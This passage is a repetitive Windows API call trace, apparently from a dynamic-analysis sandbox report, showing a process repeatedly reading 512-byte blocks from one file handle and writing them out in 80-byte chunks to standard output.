hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.682] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.683] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.683] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] GetFileType (hFile=0x50) returned 0x1 [0147.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.684] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.684] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.685] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] GetFileType (hFile=0x50) returned 0x1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.685] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.686] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.686] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] GetFileType (hFile=0x50) returned 0x1 [0147.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.686] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.687] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.687] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.687] GetFileType (hFile=0x50) returned 0x1 [0147.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.688] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.688] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] GetFileType (hFile=0x50) returned 0x1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.688] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.689] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.689] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] GetFileType (hFile=0x50) returned 0x1 [0147.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.689] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] GetFileType (hFile=0x50) returned 0x1 [0147.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.690] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.690] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.691] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.691] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 